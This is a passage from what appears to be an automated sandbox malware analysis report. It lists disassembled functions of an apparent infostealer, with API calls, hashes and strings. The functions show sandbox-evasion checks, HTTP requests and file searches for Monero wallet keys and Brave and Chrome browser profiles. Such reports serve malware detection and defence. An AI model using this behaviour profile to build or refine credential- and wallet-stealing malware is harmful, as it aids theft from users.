                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 4e0f5d05be1b8db5ab297f4c49bde610a4de99ea38dd73464e412e4ba7e6389a
                                        • Instruction ID: d7174ec218e133b21d52e74f6d9627701b4db5180fbb2c1177785aa5eface45f
                                        • Opcode Fuzzy Hash: 4e0f5d05be1b8db5ab297f4c49bde610a4de99ea38dd73464e412e4ba7e6389a
                                        • Instruction Fuzzy Hash: 4711F130A10148A7DB14FF74DE52AED7738BF60341F404654FD1A56592EF306B09C792
                                        Function 00A41110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A4112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00A41132
                                        • ExitProcess.KERNEL32 ref: 00A41143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: 9760f6c74278bc8282ebed2d863784914eead92a78bec51bf39876d4de2150ca
                                        • Instruction ID: 89aced8af5183069d17bb9f0506a8c0c77cfb0a51cc00265a51322436aa5aa70
                                        • Opcode Fuzzy Hash: 9760f6c74278bc8282ebed2d863784914eead92a78bec51bf39876d4de2150ca
                                        • Instruction Fuzzy Hash: 16E0E674A45308FBF710ABA49D0AB0D7678AB44B42F104155F709761D0D6B52640979E
                                        Function 00A410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00A410B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00A410F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 03408ecc4fee333a27eecf74150d8f4e594fcc1243364319a177f068100fd5e4
                                        • Instruction ID: 188562dde33a426930c5f75adb70b4b99b8385defb0f471bc7fdd1358c461682
                                        • Opcode Fuzzy Hash: 03408ecc4fee333a27eecf74150d8f4e594fcc1243364319a177f068100fd5e4
                                        • Instruction Fuzzy Hash: C1F0E2B1641208BBE7149BA4AC49FAEB7E8E705B15F300448F904E3280D5719E40DBA4
                                        Function 00A41190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A57910
                                          • Part of subcall function 00A578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A57917
                                          • Part of subcall function 00A578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00A5792F
                                          • Part of subcall function 00A57850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A411B7), ref: 00A57880
                                          • Part of subcall function 00A57850: RtlAllocateHeap.NTDLL(00000000), ref: 00A57887
                                          • Part of subcall function 00A57850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A5789F
                                        • ExitProcess.KERNEL32 ref: 00A411C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: ba2836f2f61c5dfa815cd08f09563504f8526af4846810bba1ad2f727341b48c
                                        • Instruction ID: c241297842ee1e5b144ef2545f1296901b0a5ad3ad0dc97ed9ce1906e105fe5a
                                        • Opcode Fuzzy Hash: ba2836f2f61c5dfa815cd08f09563504f8526af4846810bba1ad2f727341b48c
                                        • Instruction Fuzzy Hash: E7E012B591430157DE0077B4BD0AB2E329C6B54387F040529FF05E3102FE39E885866E

                                        Non-executed Functions

                                        Function 00A538B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00A538CC
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00A538E3
                                        • lstrcat.KERNEL32(?,?), ref: 00A53935
                                        • StrCmpCA.SHLWAPI(?,00A60F70), ref: 00A53947
                                        • StrCmpCA.SHLWAPI(?,00A60F74), ref: 00A5395D
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A53C67
                                        • FindClose.KERNEL32(000000FF), ref: 00A53C7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 222e2dd1f18fd7acc568492311b180df23bae02f8cadcace2d5364d7e942b6c6
                                        • Instruction ID: 61efe1752c5136ced0887f5a90871ba58452b67d7f7cafb2586ecc77c49e625e
                                        • Opcode Fuzzy Hash: 222e2dd1f18fd7acc568492311b180df23bae02f8cadcace2d5364d7e942b6c6
                                        • Instruction Fuzzy Hash: 25A135B2900218ABDF24DF64DD85FEE7378BB98301F044589FA0D96141EB759B88CF66
                                        Function 00A4BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00A60B32,00A60B2B,00000000,?,?,?,00A613F4,00A60B2A), ref: 00A4BEF5
                                        • StrCmpCA.SHLWAPI(?,00A613F8), ref: 00A4BF4D
                                        • StrCmpCA.SHLWAPI(?,00A613FC), ref: 00A4BF63
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4C7BF
                                        • FindClose.KERNEL32(000000FF), ref: 00A4C7D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-726946144
                                        • Opcode ID: d65c7aaec9f3e784c1ccc44bd4c09a2905d38fb12cbbb457f7fd0005f573c06b
                                        • Instruction ID: 21c56efec867dba9519a0fe25f2f5d2918145206f5804d3af1545da8f4e5d326
                                        • Opcode Fuzzy Hash: d65c7aaec9f3e784c1ccc44bd4c09a2905d38fb12cbbb457f7fd0005f573c06b
                                        • Instruction Fuzzy Hash: AA425672A10104ABDB14FB70DE56EED737CBFA4301F404658B90A96191EF34AB4DCBA2
                                        Function 00A54910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00A5492C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00A54943
                                        • StrCmpCA.SHLWAPI(?,00A60FDC), ref: 00A54971
                                        • StrCmpCA.SHLWAPI(?,00A60FE0), ref: 00A54987
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A54B7D
                                        • FindClose.KERNEL32(000000FF), ref: 00A54B92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 7bf42351ba7253a27fdda3ae7a4c896f4dd72749536fd66be902c62b9e099755
                                        • Instruction ID: 249fa447ce8af88f89297dccbb34106e62a385fafb96c528426a36cf2745f617
                                        • Opcode Fuzzy Hash: 7bf42351ba7253a27fdda3ae7a4c896f4dd72749536fd66be902c62b9e099755
                                        • Instruction Fuzzy Hash: EF6155B1910218ABDB24EBB0DC45FEE737CBB48701F044589F60996141EB75EB89CFA5
                                        Function 00A54570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A54580
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A54587
                                        • wsprintfA.USER32 ref: 00A545A6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00A545BD
                                        • StrCmpCA.SHLWAPI(?,00A60FC4), ref: 00A545EB
                                        • StrCmpCA.SHLWAPI(?,00A60FC8), ref: 00A54601
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5468B
                                        • FindClose.KERNEL32(000000FF), ref: 00A546A0
                                        • lstrcat.KERNEL32(?,0160EAF0), ref: 00A546C5
                                        • lstrcat.KERNEL32(?,0160DE40), ref: 00A546D8
                                        • lstrlen.KERNEL32(?), ref: 00A546E5
                                        • lstrlen.KERNEL32(?), ref: 00A546F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: 196247e1f5ff97a369fc9df323855009eaed38268017a140219f2d3b0ac8825f
                                        • Instruction ID: c4d73ef6f805b6a777a54cd8dbb3ef46e60193c23aceb17fd4b7edfd9e2dd719
                                        • Opcode Fuzzy Hash: 196247e1f5ff97a369fc9df323855009eaed38268017a140219f2d3b0ac8825f
                                        • Instruction Fuzzy Hash: DE5166B5910218ABD724EB70DD89FEE737CBB58301F404589F60996190EB749BC8CFA6
                                        Function 00A53EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00A53EC3
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00A53EDA
                                        • StrCmpCA.SHLWAPI(?,00A60FAC), ref: 00A53F08
                                        • StrCmpCA.SHLWAPI(?,00A60FB0), ref: 00A53F1E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A5406C
                                        • FindClose.KERNEL32(000000FF), ref: 00A54081
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: b807be5ed19fb4c4d0514c8bcbaed11ce4f10a7b9e4b047f1ed1bcedbcc0f07c
                                        • Instruction ID: 4bd653ea469b44cb767f485deff31c35c1f2a9c32facfb021752007e405e3793
                                        • Opcode Fuzzy Hash: b807be5ed19fb4c4d0514c8bcbaed11ce4f10a7b9e4b047f1ed1bcedbcc0f07c
                                        • Instruction Fuzzy Hash: 0A516BB2900218EBDB24EBB0DD45FEE737CBB58301F004589B65996080EB75EB89CF65
                                        Function 00A4ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00A4ED3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00A4ED55
                                        • StrCmpCA.SHLWAPI(?,00A61538), ref: 00A4EDAB
                                        • StrCmpCA.SHLWAPI(?,00A6153C), ref: 00A4EDC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00A4F2AE
                                        • FindClose.KERNEL32(000000FF), ref: 00A4F2C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: c3b95895bd81b9d4cf65a7152431b7d98f4c41f18c691b94b6a4713ef05a400e
                                        • Instruction ID: b066be49ceb308101cd0ddf29d9335bfc613137ed01741a9ec3e118fd4a7c47c
